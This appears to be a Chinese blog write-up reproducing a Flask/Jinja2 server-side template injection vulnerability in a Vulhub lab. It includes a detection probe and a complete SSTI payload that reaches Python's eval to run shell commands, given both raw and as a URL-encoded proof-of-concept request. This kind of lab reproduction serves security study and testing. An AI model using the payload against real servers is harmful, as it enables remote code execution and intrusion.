Flask(Jinja2)服务端模板注入 漏洞复现

最新推荐文章于 2023-10-29 23:16:57 发布
最新推荐文章于 2023-10-29 23:16:57 发布
阅读量1.9k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: Flask Jinja2 SSTI 服务端模板注入漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/116358423
版权

@[TOC](Flask(Jinja2)服务端模板注入 漏洞复现)

一、漏洞描述

模版引擎被 Web 应用程序广泛用于呈现动态数据。不安全的模版语法可以嵌入用户输入实现服务器端的模版注入,这是一个经常出现的严重漏洞。模版注入可以直接攻击 Web 服务器内部结构,并获取到远程代码执行权限(RCE)。

二、漏洞影响

三、漏洞复现

1、环境搭建

使用 Vulhub 在服务器上搭建:

cd /vulhub/flask/ssti
docker-compose up -d

访问127.0.0.1:8000,进入到主页面:
在这里插入图片描述

2、漏洞复现

第一步:判断是否存在漏洞:
在这里插入图片描述
其存在 GET 方式的传参,通过传入?name={{7*7}}测试:
在这里插入图片描述
返回49,说明存在 SSTI 漏洞存在。

第二步:漏洞利用
通过 eval() 函数并执行任意 Python 代码:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

即访问:http://your-ip:8000/?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D
得到回显:
在这里插入图片描述

四、漏洞POC

?id=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D

五、参考链接

https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf

六、利用工具

tplmap
在这里插入图片描述

Senimo_
关注
专栏目录
flask框架jinja2模板模板继承实例分析
09-18
首先,我们来探讨一下如何在Flask中使用Jinja2模板。在Flask应用中,Jinja2模板通常保存在名为templates的文件夹中。Flask在运行时会自动查找这个文件夹,并渲染其中的模板。例如,在上述内容中,我们看到了一个名为...
Vulnhub flaskSSTI漏洞复现
qq_69209270的博客
09-23 340
Vulnhub flaskSSTI漏洞复现
任意文件读取漏洞知识梳理
热门推荐
qq_40909772的博客
11-17 1万+
文章目录1.概述2.开发语言触发点2.1 PHP2.2 Python2.3 Java2.4 Ruby2.5 Node3.中间件/服务器相关触发点3.1 Nginx错误配置3.2 数据库3.3 软链接3.4 FFmpeg3.5 Docker-API4.文件读取的目标目录5.题目复现5.1 afr_15.2 afr_25.3 afr_3 1.概述   文件读取漏洞,就是攻击者通过一些手段可以读取服务器上开发者不允许读到的文件。主要读取文件是服务器的各种配置文件文件形式存储的密钥、服务器信息(包括正在执行的进
任意文件读取漏洞flask SSTL 注入练习总结
L2329794714的博客
11-15 2564
一、flask: Flask是一个使用python编写的Web 应用框架,模板引擎使用 Jinja2 。j简单理解为,flask 是一个开发web 程序的python 第三方框架,即可以通过这个框架编写自己想要的web 程序。 二、SSTL注入: 中文解释为 服务器模板注入攻击,即服务器端接受客户端输入数据,并作为web 应用模板数据的一部分,在执行目标渲染时,恶意代码将被执行。重点就在对目标文件渲染的过程,不同的框架使用的渲染模板引擎不同,flask 使用的时Ji...
FlaskJinja2服务端模板注入漏洞
weixin_43047908的博客
08-18 893
目录前言SSTI简介Flaskjinja2关于Jinja2模板引擎服务器端模板注入SSTI什么是服务器端模板注入?服务器端模板注入有什么影响?服务器端模板注入漏洞如何产生?服务端模板注入漏洞复现漏洞环境搭建漏洞复现 前言 SSTI简介 MVC是一种框架型模式,全名是Model View Controller。 即模型(model)-视图(view)-控制器(controller) 在MVC的指导下开发中用一种业务逻辑、数据、界面显示分离的方法组织代码,将业务逻辑聚集到一个部件里面,在改进和个性化定制界面及
看我如何发现(并修复)Python 源代码中的漏洞
smellycat000的专栏
01-04 554
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士James Kettle 此前曾就 web 缓存投毒发布了一篇研究文章,本文作者为了更深入地了解这个领域的知识并查找开源领域中的相关漏洞...
Flask服务端模板(Jinja2)注入漏洞(SSTI)复现
又菜又爱倒腾的博客
10-29 1353
#Flask服务端模板(Jinja2)注入漏洞(SSTI)复现# 一、漏洞简介 服务器模板注入(SSTI)是一种利用公共 Web框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI攻击可以利用拼接恶意用户输入导致各种漏洞。通过模板,Web应用可以把输入转换成特定的HTML文件或者email格式。 二、漏洞影响 影响版本 使用Flask框架开发并且使用Jinja2模板引擎,最重要的是模板内容可控。满足该条件的Flask模块中几乎都存在注入漏洞。 三、产生原因 from
Flask模板引擎之Jinja2语法介绍
01-20
Jinja是组成Flask模板引擎。可能你还不太了解它是干嘛的,但你对下面这些百分号和大括号肯定不陌生: {% block body %} {% for user in users %} <li><a>{{ user.username }}</a></li> {% endfor %} {% ...
Flask模板引擎Jinja2使用实例
09-17
总结,Jinja2作为Flask的默认模板引擎,提供了丰富的功能和灵活性,使开发者能够高效地构建动态网页。通过理解这些基本概念和操作,你可以创建复杂的模板结构,并结合Flask的视图函数来生成动态内容。这只是一个起点...
Flask (Jinja2) 服务端模板注入漏洞复现
来日可期的博客
10-15 1129
模板引擎中,开发者可以使用特定的语法将数据与模板结合生成最终的输出。然而,如果在这个过程中,直接使用用户提供的数据而没有进行适当的过滤或转义,攻击者就可以注入恶意模板代码。攻击者可以构造恶意的输入,在用户输入中包含模板标记(如 `{{}}`),以控制模板引擎的行为。模板引擎会将用户提供的数据作为代码来执行,导致恶意代码执行在服务端上下文中
框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现
最新发布
rumil的博客
10-29 2279
中间件及框架列表:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery 等1、开发框架-PHP-Laravel-Thinkphp2、开发框架-Javaweb-St2-Spring3、开发框架-Python-django-Flask
Vulhub Flask SSTI漏洞复现
CyhDl666的博客
03-26 1048
文章目录环境搭建漏洞复现python3python2CTFSHOWWEB361WEB362WEB363 环境搭建 首先利用docker搭建好环境 docker-compose up -d docker ps查看搭建的端口:8000 漏洞复现 开始复现 flask-ssti漏洞以前有总结过 整理的不够好 今天重新整理一下 题目源码 from flask import Flask, request from jinja2 import Template app = Flask(__name__)
vulhub学习(3) flask-ssti 漏洞复现
yukinorong的博客
06-24 2214
环境准备 漏洞环境选择vulhub , 如上述配置 进入flask/ssti 打开docker环境 这里可以看见环境启动成功 由于我的vulhub配置在虚拟机上,不能直接用127访问。 打开命令行 ifconfig,找到ip 192.x docker 启动环境会另外配置端口,利用docker ps查询。发现是8000 漏洞原理 利用浏览器访问可以看见页面 查看源码 可以看到核心语句为 t = Template("hello " + name) 此处,函数利用get获取参数进入template
vulhub漏洞复现十五_flask
weixin_44193247的博客
01-26 1316
vulhub漏洞复现练习篇
Flask模板注入学习
afei001
10-23 448
目录 1.前言 2.Flask模板注入 (1)模版XSS注入 (2)SSTI文件读取和命令执行 (2.1)SSTI漏洞构造 (2.2)python常用的魔术方法 (2.3)文件读取Payload (2.4)命令执行Payload (3)模版注入防御 1.前言 对于学习Flask模板注入,需要对Flask框架和Jinja 2模板引擎有一定的了解。不熟悉的小伙伴可以先学习Flask入门文章。 2.Flask模板注入 在不正确的使用flask...
Python——flask漏洞探究总结(持续更新)
kuller_Yan的博客
04-08 2736
通过python的对象的继承来一步步实现文件读取和命令执行的的。 流程: 找到父类<type ‘object’>–>寻找子类–>找关于命令执行或者文件操作的模块。 几个魔术方法: __class__ 返回类型所属的对象 __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。 __base__ 返回该对象所继承的基类 // __base...
【WEB攻防】Flask(Jinja2) 服务端模板注入漏洞 原理+防御
AAAAAAAAAAAA66的博客
12-19 6845
前面写CTF题目的时候做过几道SSTI模板注入的题目。最近又遇到了一个不错的CTF网站, http://bmzclub.cn 里面不但有CTF题目,更重要的是有漏洞环境,不需要自己去一个一个去安装,对于我这样的懒人简直是福音。 目录 Flask模板注入简介 FlaskJinja2介绍: 注入原理 复现 手动注入 工具探测 Flask模板注入简介 FlaskJinja2介绍: 1.Flask是一个轻量级的基于Python的web框架。 2.Jinja 模板只是一个属于.
FlaskJinja2服务端模板注入漏洞复现
玄道的网安博客
01-17 701
简介 Flask 是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用 Werkzeug ,模板引擎则使用 Jinja2漏洞概述 其中采用jinja2模板引擎传递参数,在书写不规范的时候会发生jinja模板语法的注入命令执行 环境搭建 这里使用vulhub进行搭建 地址: https://github.com/vulhub/vulhub/tree/master/flask/ssti 进入目录并编译运行测试环境 cd vu...
Flask框架与Jinja2模板渲染深度解析
2. Flask中的Jinja2模板渲染 在Flask应用中,`render_template`函数是用于渲染模板的关键。当调用这个函数并传递模板名称时,Flask会自动在默认的`templates`目录下查找对应的文件。例如,`render_template('index....
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值